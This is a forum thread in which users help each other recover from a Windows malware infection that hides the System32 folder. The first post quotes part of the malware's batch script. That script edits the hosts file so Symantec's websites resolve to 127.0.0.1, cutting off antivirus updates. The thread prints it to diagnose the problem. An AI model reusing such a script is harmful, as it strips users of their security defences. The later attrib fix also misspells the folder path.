[Chiu]

Hi all,

I'm having an issue with my PC which seems to have started yesterday. I noticed that the CPU usage kept fluctuating between 0-100% - Task Manager was showing a few processes including LSASS.exe, SERVICES.exe and TASKMGR.exe to be responsible.

I updated my virus definitions (Symantec) and ran a scan but didn't find anything. AdAware found some data mining cookies which have now been removed. I've also run the online scan from Trends Micro.

The fluctuating CPU usage issue has gone away now (after rebooting and doing a virus scan in safemode - although this didn't find anything).

However, there are other issues I can't seem to resolve:

Using Explorer, I can't access my C:\Winnt\System32 folder (shows Page not found). I've checked the settings under Folder Options > View, but it's already set to show hidden fields and not to hide protected OS files. However, I can access the C:\Winnt\System32 folder using a DOS command console. Other folders in the C:\Winnt folder don't seem to have been effected. I've tried running "c:\winnt\system32 -a -r -h -s but it comes up with "File not found - C:\winnt\attrib".

Every other time I try to open an Access database, it shows 'Workgroup Administrator couldn't create the workgroup information file. Make sure that you have specified a valid path and file name, that you have adequate permissions to create the file, and that you have enough disk space on the destination drive. (-1811). If I close Access and then try opening the Access database again, it works fine.

Some other things I've found which I'm hoping will give some clues are:

Hosts file - this had been changed to include a number of websites referenced against 127.0.0.1. I found a b.bat file in the C:\ folder which seems to have been responsible for this. Below is part of the code included in the b.bat file:

@echo off
Set IP=127.0.0.1
Set HostsNT=%windir%\system32\drivers\etc\hosts
Set Hosts9x=%windir%\drivers\etc\hosts
if exist %HostsNT% Set Hosts=%HostsNT%
if exist %Hosts9x% Set Hosts=%Hosts9x%
:Check
type %Hosts% | find "symantec">NUL
If Errorlevel 1 GoTo EditHosts
GoTo End
:EditHosts
Attrib -R -A %Hosts%
Echo.>>%Hosts%
Echo %IP% www.symantec.com>>%Hosts%
Echo %IP% securityresponse.symantec.com>>%Hosts%
Echo %IP% symantec.com>>%Hosts%

I've managed to replace this Hosts file with a clean one.

Another thing I found whilst searching the Run and Runonce folders in the registry were references to media.exe and wmedia.exe. I've been searching the web for more information about media.exe and found FldMedia-A and p2pnetwork.exe - but the descriptions (symptoms) of these don't seem to match what I find on my PC.

Any ideas what might have caused this and how I can regain access to my C:\Winnt\System32 folder?

Thanks!

Chiu.

[Advertisements]

Hi Chiu. Welcome to Geeks to Go. Go to start, run and type sfc /scannow You will need to have your windows install cd in the cd drive so windows can get the files it needs.


I would suggest downloading spybot (see the malware removal guide at the top of this forum. You will find a link to it there). Make sure spybot is updated. Run a scan, and then run immunize. This will protect your host file.

[austin_o]

Hi Chiu. Welcome to Geeks to Go. Go to start, run and type sfc /scannow You will need to have your windows install cd in the cd drive so windows can get the files it needs.


I would suggest downloading spybot (see the malware removal guide at the top of this forum. You will find a link to it there). Make sure spybot is updated. Run a scan, and then run immunize. This will protect your host file.

[isjma]

Hello.

I'm having exactly the same problem. I tried with spybot, but don't resolve the problem. I think is a virus but McAfee VirusScan doesn't detect it.

¿Any idea about it?

Thanks.

isjma

[Chiu]

Hello isjma,

Yes, I seem to have at least recovered my System32 folder.

I shared my C: drive on the network and a colleague of mine tried to connect to my C: across the network. As soon as he connected, his anti-virus scanner detected the Backdoor.HackDefender virus in a system.exe file in C:\ (although we're not sure if this was related to the issues seen).

We found that his PC was able to view the System32 folder on my C:\Winnt folder. We checked the permissions set and they all seemed to be fine. We set Full Control for Everyone but I was still unable to view the System32 folder from my own PC. Also, he was able to see the media.exe file. We were going to copy this onto a floppy disk to send to Symantec, but as soon as we clicked on that file, his antivirus scanner detected the W32.Randex virus and deleted it.

After rebooting my PC, I can now view my System32 folder using Explorer. I'm currently running a full system scan in safemode and so far it has detected the W32.Randex virus in 3 other files.

Hope this will be of some help to you.

Chiu.

[isjma]

I resolved the problem with your information.

Thank you very much, Chiu.

isjma

[illit]

i have this problem with not being able to see my windows/system32 folder. i have scanned with almost all the programs suggested and it has not fixed the problem. anyway anybody can help me???

[Chiu]

Scanning didn't help me either, I think it's because the virus is in the System32 folder which is hidden, so there doesn't seem to be any point in scanning unless your virus checker is able to access this folder.

As mentioned in my previous post, the only way I was able to regain access to my System32 folder was by accessing it via another PC on the network. Maybe there's another way to do it but I couldn't figure one out at the time.

[illit]

i do not have any way of scanning my computer from another computer i tried the online scanners and it didn't find anything. i think i can't see system32 because of p2pnetwork.exe or w32.p2p.alcan.a (which i know p2pnetwork.exe is completely gone but w32.p2p.alcan.a keeps showing up almost everyday when i scan with ad-aware) do u think that is right? also i can see my system32 folder if i open up a ftp client or jus type it in explorer. what did u delete again to get the folder back?

[illit]

okay i thought of something right after i posted i open system32 by typing it in the address bar then selected all files and right clicked and scanned with norton. it didn't find anything but it says:

Unable to open the file C:\Windows\system32\h323log.txt. The file is in use by another application or you don't have permission to open this file.

now i think i'd have permission but does anybody know if this is normal??? or if this log is even supposed to be there??? i opened it with notepad but it is empty.

Edited by illit, 09 June 2005 - 07:57 PM.

[Kouki]

guys finally i have the ultimate solution to that problem and im happy to share this... ive been a victim of this p2pnetwork.exe and mscongig virus TWICE.. when i first had that vius i searched yahoo for p2pnetwork and somehow end up in a web page of people complaining why cant they access regedit, command prompt blal bla bla... then theres this one guy came up with a brilliant solution for typing something about the systems32 attribute in dos.. and then i did what he said and recovered my system32 (unhide)... but then p2pnetwork.exe striked for the second time.... so, yeah its gone again.. unfortunately this time i lost the site that gave me that info...... thats my story!
after busting my [bleep] looking for every result that yahoo shown for missing system32 folder, i finally got it.. here it is!

go to run, type system32 in the box.. after you open it look for command.exe (usually the string that exe is not included) so just look for command....after opening that type this...

attrib -a -h -r -s c:\windows\sytem32 (and hit enter)

or

attrib -a -h -r -s c:/windows/sytem32

thats it, look to your windows folder and you can access it again there!
hope this works to all of you!

(P.S) there is alot of people posting for this problem here and this site did not come up with any working solution! that includes me...

[illit]

so simple!!! i looked everywhere and couldn't find anything THANKS

[superbuka]

This worked for me too .... 3 years later!